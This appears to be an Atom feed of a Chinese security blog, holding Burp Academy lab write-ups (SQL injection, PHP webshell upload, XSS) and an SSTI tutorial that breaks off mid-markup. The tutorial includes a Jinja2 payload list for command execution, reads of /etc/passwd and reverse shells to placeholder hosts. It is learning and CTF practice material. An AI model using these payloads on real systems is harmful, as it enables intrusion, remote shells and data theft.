<?xml version="1.0" encoding="utf-8"?>
<feed xmlns="http://www.w3.org/2005/Atom">
  <author>
    <name>Cl1ck-t0</name>
  </author>
  <generator uri="https://hexo.io/">Hexo</generator>
  <id>https://cl1ck-t0.github.io/</id>
  <link href="https://cl1ck-t0.github.io/" rel="alternate"/>
  <link href="https://cl1ck-t0.github.io/atom.xml" rel="self"/>
  <rights>All rights reserved 2026, Cl1ck-t0</rights>
  <title>Cl1ck-t0's blog</title>
  <updated>2026-04-19T08:55:26.009Z</updated>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="burp靶场" scheme="https://cl1ck-t0.github.io/tags/burp%E9%9D%B6%E5%9C%BA/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="burp靶场漏洞实战wp"><a class="markdownIt-Anchor" href="#burp靶场漏洞实战wp"></a> burp靶场漏洞实战wp</h1><p>之前一直在做各种题库中的题目，偶然得知burp靶场的实验不错，故作次wp，将持续跟进解题进度</p><h2 id="一-sql注入"><a class="markdownIt-Anchor" href="#一-sql注入"></a> 一、sql注入</h2><h3 id="1实验where条款中允许检索隐藏数据的sql注入漏洞"><a class="markdownIt-Anchor" href="#1实验where条款中允许检索隐藏数据的sql注入漏洞"></a> 1.实验：WHERE条款中允许检索隐藏数据的SQL注入漏洞</h3><p>开头一个个看过去，没什么特别的。仔细看发现在<strong>Refine your search:</strong></p><p>下面点进去url会变为</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://0ade00b5041780e7808e120800720083.web-security-academy.net/filter?category=Tech+gifts</span><br></pre></td></tr></table></figure><p>看起来存在SQL注入。</p><p>改成</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://0ade00b5041780e7808e120800720083.web-security-academy.net/filter?category=1&#x27; or 1=1--+</span><br></pre></td></tr></table></figure><p>直接过了emmmmmm</p><h3 id="2实验允许登录绕过的sql注入漏洞"><a class="markdownIt-Anchor" href="#2实验允许登录绕过的sql注入漏洞"></a> 2.实验：允许登录绕过的SQL注入漏洞</h3><p>题目描述：该实验室的登录功能中存在SQL注入漏洞。</p><p>要解决实验室问题，可以执行SQL注入攻击，以用户身份登录应用。<code>administrator</code></p><p>直接万能语句1’ or 1=1–+ 秒了</p><h3 id="3实验sql注入union攻击确定查询返回的列数"><a class="markdownIt-Anchor" href="#3实验sql注入union攻击确定查询返回的列数"></a> 3.实验：SQL注入UNION攻击，确定查询返回的列数</h3><p>题目看出来是联合注入，</p><p>这里已经很熟悉了，直接非常顺利</p><p>1’ order by 3–+通过</p><p>1’ order by 4–+报错，知道三列</p><p>于是写payload，这里有一个问题当时错了：</p><p>我最开始写的payload是：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://0a9000cf04defb8b808a26d400ac0024.web-security-academy.net/filter?category=-1&#x27; union select 1,2,3--+</span><br></pre></td></tr></table></figure><p>页面报错，当时不知道为什么啊，后来查阅资料才知道：因为 <code>UNION</code> 要求类型兼容。如果第一列是整数，你输入 <code>'1'</code> 可能会报错；而 <code>NULL</code> 可以自适应任何类型。所以这里用1,2,3是错误的QAQ</p><p>修改payload得到：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://0a9000cf04defb8b808a26d400ac0024.web-security-academy.net/filter?category=-1&#x27; union select NULL ,NULL ,NULL--+</span><br></pre></td></tr></table></figure><p>通过</p><h2 id="二-文件上传漏洞"><a class="markdownIt-Anchor" href="#二-文件上传漏洞"></a> 二、文件上传漏洞</h2><h3 id="1实验室通过网页壳上传远程代码执行"><a class="markdownIt-Anchor" href="#1实验室通过网页壳上传远程代码执行"></a> 1.实验室：通过网页壳上传远程代码执行</h3><p>题目描述：</p><p>该实验室包含一个易受攻击的图像上传功能。它不会在用户上传的文件存储到服务器文件系统前进行任何验证。</p><p>要解决实验问题，上传一个基础的PHP网页壳，并用它导出文件内容。请通过实验室横幅中的按钮提交此秘密。<code>/home/carlos/secret</code></p><p>您可以使用以下凭证登录您自己的账户：<code>wiener:peter</code></p><p>ps：骗你的，刚开始我甚至不知道这是题目描述（）</p><p>打开来就开始找上传点，然后在评论区找到了上传头像的位置，出于以往经验，我直接尝试上传，却得到missing parameter，多次尝试无果后我转变方向，发现没有login（），这才知道wiener:peter原来是题目里的（）气笑了说是</p><p>题目提示：如果你能成功上传网页外壳，你实际上就完全控制了服务器。这意味着你可以读写任意文件，窃取敏感数据，甚至利用服务器来针对内部基础设施和网络外其他服务器发动攻击。例如，以下PHP一行代码可用于从服务器文件系统读取任意文件：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php echo file_get_contents(&#x27;/path/to/target/file&#x27;); ?&gt;</span><br></pre></td></tr></table></figure><p>上传后，发送对该恶意文件的请求将在响应中返回目标文件的内容。</p><p>然后就写一句话木马：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php echo file_get_contents(&#x27;/home/carlos/secret&#x27;); ?&gt;</span><br></pre></td></tr></table></figure><p>上传成功后，查看上传路径，木马便会自动执行，</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">GET /files/avatars/1.php HTTP/2</span><br></pre></td></tr></table></figure><p>得到目标：</p><p>Rnh4NwyW1Gl2Ko3yWlVT2eFgyKRH9Hcd</p><h2 id="三-跨站脚本"><a class="markdownIt-Anchor" href="#三-跨站脚本"></a> 三、跨站脚本</h2><h3 id="1实验将xss映射到html上下文中且没有编码"><a class="markdownIt-Anchor" href="#1实验将xss映射到html上下文中且没有编码"></a> 1.实验：将XSS映射到HTML上下文中，且没有编码</h3><p>最简单的xss，</p><p>直接<code>&lt;script&gt;alert()&lt;/script&gt;</code>就行。</p><h3 id="2dom-xss-在-sack-中使用源代码documentwritelocationsearch"><a class="markdownIt-Anchor" href="#2dom-xss-在-sack-中使用源代码documentwritelocationsearch"></a> 2.DOM XSS 在 sack 中使用源代码<code>document.write``location.search</code></h3><p>理解DOM漏洞原理</p><ul><li><strong>源 (Source)</strong>：<code>location.search</code>，这是浏览器地址栏中 <code>?</code> 后面的部分（也就是 GET 参数）。攻击者可以完全控制这部分。</li><li><strong>汇 (Sink)</strong>：<code>document.write</code>。这个函数会将传入的字符串直接解析为 HTML 写入页面。如果传入的数据包含 <code>&lt;script&gt;</code> 标签，它<strong>通常不会执行</strong>（这是很多人的误区）。</li><li><strong>关键点</strong>：在 <code>document.write</code> 的上下文中，最可靠的 XSS 触发方式不是 <code>&lt;script&gt;alert(1)&lt;/script&gt;</code>，而是<strong>HTML 事件处理器</strong>，例如 <code>&lt;img src=x onerror=alert(1)&gt;</code>。</li></ul><p>DOM型xss最常见的来源是url,故我们可以尝试一下，在搜索栏里随便输入发现url变成</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">https://0a360098047f989f80da125100e00067.web-security-academy.net/?search=1</span><br></pre></td></tr></table></figure><p>payload如下：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">&quot;&gt;&lt;img src=x onerror=alert(666)&gt;</span><br><span class="line">这里注意闭合前面的&lt;&quot;</span><br><span class="line">&quot;&gt;&lt;svg onload=alert(666)&gt;</span><br></pre></td></tr></table></figure><p>其实本实验的核心还是在于闭合前面语句上面。</p><h3 id="3dom-xss-in-innerhtml-sink-using-source-locationsearch"><a class="markdownIt-Anchor" href="#3dom-xss-in-innerhtml-sink-using-source-locationsearch"></a> 3.DOM XSS in <code>innerHTML</code> sink using source <code>location.search</code></h3><p>比2还简单,直接</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">&lt;img src=x onerror=alert()&gt;</span><br></pre></td></tr></table></figure><p>即可。</p><p>这里简单说说原理，</p><ul><li><strong><code>&lt;img</code></strong>：这是一个标准的 HTML 图片标签的开始。浏览器看到它，就会准备去加载一张图片。</li><li><strong><code>src=x</code></strong>：这是图片的源地址属性。我们故意给它一个<strong>不存在的、无效的</strong>地址 <code>x</code>。</li><li><strong><code>onerror=alert(1)</code></strong>：这是一个<strong>事件处理器</strong>。<code>onerror</code> 是 <code>&lt;img&gt;</code> 标签的一个内置事件，它的触发条件是：<strong>当浏览器加载 <code>src</code> 指定的图片资源失败时</strong>。</li></ul><p>因此会触发xss</p><h3 id="4实验jquery-锚属性汇入-dom-xss-使用源代码hreflocationsearch"><a class="markdownIt-Anchor" href="#4实验jquery-锚属性汇入-dom-xss-使用源代码hreflocationsearch"></a> 4.实验：jQuery 锚属性汇入 DOM XSS 使用源代码<code>href``location.search</code></h3><p>本实验室在提交反馈页面中包含一个基于DOM的跨站脚本漏洞。它使用 jQuery 库的选择函数来寻找锚点元素，并利用 的数据更改其属性。<code>$``href``location.search</code></p><p>要解决这个实验，可以设置“回溯”链接提醒。<code>document.cookie</code></p>]]>
    </content>
    <id>https://cl1ck-t0.github.io/2026/03/31/burp%E9%9D%B6%E5%9C%BA%E6%BC%8F%E6%B4%9E%E5%AE%9E%E6%88%98/</id>
    <link href="https://cl1ck-t0.github.io/2026/03/31/burp%E9%9D%B6%E5%9C%BA%E6%BC%8F%E6%B4%9E%E5%AE%9E%E6%88%98/"/>
    <published>2026-03-31T14:06:57.000Z</published>
    <summary>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" cla]]>
    </summary>
    <title>burp靶场漏洞实战</title>
    <updated>2026-04-19T08:55:26.009Z</updated>
  </entry>
  <entry>
    <author>
      <name>Cl1ck-t0</name>
    </author>
    <category term="web" scheme="https://cl1ck-t0.github.io/tags/web/"/>
    <category term="web漏洞" scheme="https://cl1ck-t0.github.io/tags/web%E6%BC%8F%E6%B4%9E/"/>
    <content>
      <![CDATA[<link rel="stylesheet" class="aplayer-secondary-style-marker" href="\assets\css\APlayer.min.css"><script src="\assets\js\APlayer.min.js" class="aplayer-secondary-script-marker"></script><h1 id="ssti注入"><a class="markdownIt-Anchor" href="#ssti注入"></a> SSTI注入</h1><p>简述：<strong>SSTI（Server-Side Template Injection）</strong></p><p>服务器端模板注入，攻击者能够向服务器端模板引擎注入恶意模板代码，从而在服务器端执行任意代码。</p><h2 id="一-前置基础"><a class="markdownIt-Anchor" href="#一-前置基础"></a> 一、前置基础</h2><p>首先我们要知道什么是模板。</p><p><strong>模板</strong> 是一种用于生成动态内容的工具。</p><p>它们通常包含两个基本部分：静态内容和动态占位符。</p><p>如图：<strong>绿色</strong> 部分为 <strong>静态内容</strong> ，而 <strong>橙色</strong> 部分则是 <strong>动态占位符</strong></p><p><img src="https://hello-ctf.com/hc-web/assets/image-20231128133158187.png" alt="image-20231128133158187" /></p><p>模板的主要作用是分离业务逻辑和展示逻辑，使得前端开发者和后端开发者可以并行工作，同时也使得代码更易于维护。</p><p>静态部分：由前端开发者设计，包括HTML、CSS、JavaScript等。 动态部分：由后端开发者提供数据，模板引擎将数据填充到模板中，生成最终的页面。</p><p><strong>模板引擎的工作流程</strong></p><p>1.解析模板：将模板文件解析成抽象语法树（AST）或类似的内部表示。</p><p>2.处理指令：执行模板中的指令（如循环、条件判断等）。</p><p>3.替换占位符：将占位符替换为实际的值。</p><p>4.输出结果：将处理后的模板输出为字符串（如HTML）。</p><p><strong>模板注入攻击成功的关键，在于攻击者输入的内容（如3）能够被模板引擎解析并生成抽象语法树（AST），而不仅仅是作为纯文本处理，AST是连接模板语法和底层代码执行的桥梁。攻击者的输入被解析成AST只是第一步，而真正执行这个AST并使其产生效果的，是模板引擎的代码生成器或解释器</strong>。</p><p>eg.[HNCTF 2022 WEEK2]ez_SSTI</p><p>传入</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">http://node5.anna.nssctf.cn:28434/?name=&#123;&#123;7*7&#125;&#125;</span><br></pre></td></tr></table></figure><p>返回49，说明存在服务器端模版注入。</p><h2 id="二-ssti注入流程"><a class="markdownIt-Anchor" href="#二-ssti注入流程"></a> 二、SSTI注入流程</h2><ol><li><strong>信息收集</strong>：<ul><li>确定目标使用的编程语言和模板引擎（如 Flask 使用 Jinja2）。</li><li>测试注入点：URL 参数、表单、评论区、HTTP 请求头等。</li><li>提交测试 payload：<code>&#123;&#123;7*7&#125;&#125;</code>或 <code>&#123;% print(1+1) %&#125;</code>，观察是否被解析。</li></ul></li><li><strong>了解模板引擎特性</strong>：<ul><li><strong>Jinja2</strong>：支持 Python 反射（如 <code>__class__</code>, <code>__globals__</code>）。</li><li><strong>Twig</strong>：支持过滤器和回调函数。</li><li><strong>FreeMarker</strong>：支持 Java 类调用（如 <code>?new()</code>）。</li></ul></li></ol><p>3.<strong>确认漏洞</strong>：</p><ul><li><p>请求：<code>http://example.com/?name=&#123;&#123;7*7&#125;&#125;</code></p></li><li><p>响应：<code>49</code>（表明 Jinja2 SSTI 漏洞存在）。</p><p>4.<strong>构造 payload</strong>：</p></li><li><p>读取配置：<code>&#123;&#123; config &#125;&#125;</code></p></li><li><p>执行命令：<code>&#123;&#123; ''.__class__.__mro__[1].__subclasses__()[159].__init__.__globals__['os'].popen('whoami').read() &#125;&#125;</code></p><p>5.<strong>触发执行</strong></p></li></ul><p>在具体说明之前，我们简要说明一下类之间的继承关系，因为在后面的攻击中用到的就是这种继承关系的不断调用最终达到一个rce的效果。</p><p>eg.</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">class A:pass</span><br><span class="line">class B(A):pass</span><br><span class="line">class C(B):pass</span><br><span class="line">class D(C):pass</span><br></pre></td></tr></table></figure><p>我们创建了4个类，其中的B类继承了A类，C、D类继承了B类,如果我们在这创建一个C的对象c，那么我们就可以通过__class__魔术方法来找到它的当前类</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">class A:pass</span><br><span class="line">class B(A):pass</span><br><span class="line">class C(B):pass</span><br><span class="line">class D(C):pass</span><br><span class="line">c=C()</span><br><span class="line">print(c.__class__)</span><br></pre></td></tr></table></figure><p>它返回了一个当前的类为C，我们还可以通过__base__这个魔术方法来找到当前类的父类:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">class A:pass</span><br><span class="line">class B(A):pass</span><br><span class="line">class C(B):pass</span><br><span class="line">class D(C):pass</span><br><span class="line">c=C()</span><br><span class="line">print(c.__class__.__base__)</span><br></pre></td></tr></table></figure><p>找到了C类的父类B类，如果还想要找B类的父类可以接着使用__base__魔术方法:</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">class A:pass</span><br><span class="line">class B(A):pass</span><br><span class="line">class C(B):pass</span><br><span class="line">class D(C):pass</span><br><span class="line">c=C()</span><br><span class="line">print(c.__class__.__base__.__base__)</span><br></pre></td></tr></table></figure><p>当然这样一个一个递进上去的方法有一些麻烦，所以我们可以使用__mro__魔术方法来一步到位看到类的所有父类</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">class A:pass</span><br><span class="line">class B(A):pass</span><br><span class="line">class C(B):pass</span><br><span class="line">class D(C):pass</span><br><span class="line">c=C()</span><br><span class="line">print(c.__class__.__mro__)</span><br></pre></td></tr></table></figure><p>以数组形式在后面加上下标就能拿到指定的类了</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">class A:pass</span><br><span class="line">class B(A):pass</span><br><span class="line">class C(B):pass</span><br><span class="line">class D(C):pass</span><br><span class="line">c=C()</span><br><span class="line">print(c.__class__.__mro__[3])</span><br></pre></td></tr></table></figure><p>我们在拿到object类后就可以通过object类来查找python中的所有object类的子类，当然这其中会有我们能通过该类rce的子类。我们通过__subclasses__来获取当前类的所有子类</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">class A:pass</span><br><span class="line">class B(A):pass</span><br><span class="line">class C(B):pass</span><br><span class="line">class D(C):pass</span><br><span class="line">c=C()</span><br><span class="line">print(c.__class__.__mro__[3].__subclasses__())</span><br></pre></td></tr></table></figure><p>可以发现有很多类，前面我们也说到了python的所有类最终都是继承object类的，因此这里存在大量的类，我们最终的目的是要去进行rce</p><p>常见魔术方法：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">__class__   ：返回类型所属的对象</span><br><span class="line">__mro__     ：返回一个包含对象所继承的基类元组，方法在解析时按照元组的顺序解析。</span><br><span class="line">__base__   ：返回该对象所继承的父类</span><br><span class="line">__mro__     ：返回该对象的所有父类</span><br><span class="line"></span><br><span class="line">__subclasses__()  获取当前类的所有子类</span><br><span class="line">__init__  类的初始化方法</span><br><span class="line">__globals__  对包含(保存)函数全局变量的字典的引用</span><br></pre></td></tr></table></figure><h4 id="通用-payload-python3"><a class="markdownIt-Anchor" href="#通用-payload-python3"></a> 通用 payload ( Python3 )<a href="https://hello-ctf.com/hc-web/ssti/#payload-python3">¶</a></h4><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br><span class="line">52</span><br><span class="line">53</span><br><span class="line">54</span><br><span class="line">55</span><br><span class="line">56</span><br><span class="line">57</span><br><span class="line">58</span><br><span class="line">59</span><br><span class="line">60</span><br><span class="line">61</span><br><span class="line">62</span><br><span class="line">63</span><br><span class="line">64</span><br><span class="line">65</span><br><span class="line">66</span><br><span class="line">67</span><br><span class="line">68</span><br><span class="line">69</span><br><span class="line">70</span><br><span class="line">71</span><br><span class="line">72</span><br><span class="line">73</span><br><span class="line">74</span><br><span class="line">75</span><br><span class="line">76</span><br><span class="line">77</span><br><span class="line">78</span><br><span class="line">79</span><br><span class="line">80</span><br></pre></td><td class="code"><pre><span class="line"># 命令执行_eval</span><br><span class="line"> &#123;% for x in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">    &#123;% if x.__init__ is defined and x.__init__.__globals__ is defined and &#x27;eval&#x27; in x.__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;].__name__ %&#125;</span><br><span class="line">        &#123;&#123; x.__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;eval&#x27;](&#x27;__import__(&quot;os&quot;).popen(&quot;ls /&quot;).read()&#x27;) &#125;&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line"># 命令执行_os.py</span><br><span class="line">&#123;% for x in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">    &#123;% if x.__init__ is defined and x.__init__.__globals__ is defined and &#x27;os&#x27; in x.__init__.__globals__ %&#125;</span><br><span class="line">        &#123;&#123; x.__init__.__globals__[&#x27;os&#x27;].popen(&#x27;ls /&#x27;).read() &#125;&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line"># 命令执行_popen</span><br><span class="line">&#123;% for x in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">    &#123;% if x.__init__ is defined and x.__init__.__globals__ is defined and &#x27;popen&#x27; in x.__init__.__globals__ %&#125;</span><br><span class="line">        &#123;&#123; x.__init__.__globals__[&#x27;popen&#x27;](&#x27;ls /&#x27;).read() &#125;&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line"># 命令执行__frozen_importlib.BuiltinImporter</span><br><span class="line">&#123;% for x in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">    &#123;% if &#x27;BuiltinImporter&#x27; in x.__name__ %&#125;</span><br><span class="line">        &#123;&#123; x[&quot;load_module&quot;](&quot;os&quot;)[&quot;popen&quot;](&quot;ls /&quot;).read() &#125;&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line"># 命令执行_linecache</span><br><span class="line">&#123;% for x in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">    &#123;% if x.__init__ is defined and x.__init__.__globals__ is defined and &#x27;linecache&#x27; in x.__init__.__globals__ %&#125;</span><br><span class="line">        &#123;&#123; x.__init__.__globals__[&#x27;linecache&#x27;][&#x27;os&#x27;].popen(&#x27;ls /&#x27;).read() &#125;&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># 命令执行_exec(无回显故反弹shell)</span><br><span class="line">&#123;% for x in [].__class__.__base__.__subclasses__() %&#125;</span><br><span class="line">    &#123;% if x.__init__ is defined and x.__init__.__globals__ is defined and &#x27;exec&#x27; in x.__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;exec&#x27;].__name__ %&#125;</span><br><span class="line">        &#123;&#123; x.__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;exec&#x27;](&#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;HOST_IP&quot;,Port));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;sh&quot;)&#x27;)&#125;&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;().__class__.__bases__[0].__subclasses__()[216].__init__.__globals__[&#x27;__builtins__&#x27;][&#x27;exec&#x27;](&#x27;import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((&quot;VPS_IP&quot;,端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn(&quot;sh&quot;)&#x27;)&#125;&#125;</span><br><span class="line"></span><br><span class="line"># 命令执行_catch_warnings </span><br><span class="line">&#123;% for x in [].__class__.__base__.__subclasses__() %&#125;&#123;% if &#x27;war&#x27; in x.__name__ %&#125;&#123;&#123; x.__init__.__globals__[&#x27;__builtins__&#x27;].eval(&quot;__import__(&#x27;os&#x27;).popen(&#x27;whoami&#x27;).read()&quot;) &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line"># catch_warnings 读取文件</span><br><span class="line">&#123;% for x in [].__class__.__base__.__subclasses__() %&#125;&#123;% if x.__name__==&#x27;catch_warnings&#x27; %&#125;&#123;&#123; x.__init__.__globals__[&#x27;__builtins__&#x27;].open(&#x27;/app/flag&#x27;, &#x27;r&#x27;).read() &#125;&#125;&#123;% endif %&#125;&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line"># _frozen_importlib_external.FileLoader 读取文件</span><br><span class="line"> &#123;% for x in [].__class__.__base__.__subclasses__() %&#125; # &#123;% for x in [].__class__.__bases__[0].__subclasses__() %&#125;</span><br><span class="line">    &#123;% if &#x27;FileLoader&#x27; in x.__name__ %&#125;</span><br><span class="line">        &#123;&#123; x[&quot;get_data&quot;](0,&quot;/etc/passwd&quot;)&#125;&#125;</span><br><span class="line">    &#123;% endif %&#125;</span><br><span class="line">&#123;% endfor %&#125;</span><br><span class="line"></span><br><span class="line"># 其他RCE</span><br><span class="line">&#123;&#123;config.__class__.__init__.__globals__[&#x27;os&#x27;].popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;g.pop.__globals__.__builtins__[&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;url_for.__globals__.__builtins__[&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;lipsum.__globals__.__builtins__[&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;get_flashed_messages.__globals__.__builtins__[&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;application.__init__.__globals__.__builtins__[&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;self.__init__.__globals__.__builtins__[&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;cycler.__init__.__globals__.__builtins__[&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;joiner.__init__.__globals__.__builtins__[&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;namespace.__init__.__globals__.__builtins__[&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;ls&#x27;).read()&#125;&#125;</span><br><span class="line"></span><br><span class="line">&#123;&#123;url_for.__globals__.current_app.add_url_rule(&#x27;/1333337&#x27;,view_func=url_for.__globals__.__builtins__[&#x27;__import__&#x27;](&#x27;os&#x27;).popen(&#x27;ls&#x27;).read)&#125;&#125;</span><br></pre></td></tr></table></figure><p>ps:QAQ好抽象</p><h2 id="二编"><a class="markdownIt-Anchor" href="#二编"></a> 二编：</h2><p><img src="https://img2024.cnblogs.com/blog/3450162/202407/3450162-20240717154937641-936215290.png" alt="image" /></p><p>这里再补充一下：常见模板有Smarty、Mako、Twig、Jinja2、Eval、Flask、Tornado、Go、Django、Ruby等。</p><p>这幅图的含义是通过这些指令去判断对方用的是什么模板，下面解释一下这幅图的意思:<br />绿色箭头是执行成功，红色箭头是执行失败。<br />首先是注入<code>$&#123;7*7&#125;</code>没有回显出49的情况，这种时候就是执行失败走红线，再次注入49如果还是没有回显49就代表这里没有模板注入；如果注入回显了49代表执行成功，继续往下走注入49，如果执行成功回显7777777说明是jinja2模板，如果回显是49就说明是Twig模板。<br />然后回到最初注入<code>$&#123;7＊7&#125;</code>成功回显出49的情况，这种时候是执行成功走绿线，再次注入a{<em>comment</em>}b，如果执行成功回显ab，就说明是Smarty模板；如果没有回显出ab，就是执行失败走红线，注入${“z”.join(“ab”)}，如果执行成功回显出zab就说明是Mako模板。实际做题时也可以把指令都拿去测测看谁能对上。平时做题也可以多搜集不同模板对应的注入语句语法。</p><h3 id="常见payload"><a class="markdownIt-Anchor" href="#常见payload"></a> 常见payload：</h3><p>1.Twig模版：</p><figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span 